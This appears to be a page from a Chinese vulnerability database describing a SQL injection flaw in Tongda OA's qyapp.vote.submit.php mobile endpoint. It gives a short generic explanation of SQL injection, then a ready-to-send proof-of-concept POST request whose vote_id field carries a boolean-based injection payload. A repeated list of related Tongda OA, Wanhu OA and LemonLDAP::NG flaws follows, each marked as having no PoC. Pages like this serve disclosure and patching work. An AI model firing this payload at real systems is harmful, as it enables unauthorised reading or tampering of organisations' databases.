通达OA qyapp.vote.submit.php SQL注入漏洞

漏洞描述

SQL注入漏洞是指攻击者通过在Web应用程序的输入字段中插入恶意SQL代码，从而绕过应用程序的安全措施，直接对数据库执行非法操作。这种漏洞通常发生在应用程序未对用户输入进行充分验证和过滤的情况下，使得攻击者能够获取、修改或删除数据库中的数据，甚至可能执行服务器上的任意代码。

PoC代码

POST /mobile/api/qyapp.vote.submit.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded

submitData={"a":{"vote_type":"1","vote_id":"if((select 995=995),1,2*1e308)","value":"1"}}

漏洞描述

PoC代码

相关漏洞推荐

通达OA v11.7 delete_cascade.php SQL 注入漏洞 无POC

通达OA /general/reportshop/utils/upload.php 文件上传漏洞（CNVD-2021-21890） 无POC

通达OA delete_seal.php SQL 注入漏洞（CVE-2023-4165） 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

通达OA v11.7 delete_cascade.php SQL 注入漏洞无POC

通达OA /general/reportshop/utils/upload.php 文件上传漏洞（CNVD-2021-21890）无POC

通达OA delete_seal.php SQL 注入漏洞（CVE-2023-4165）无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC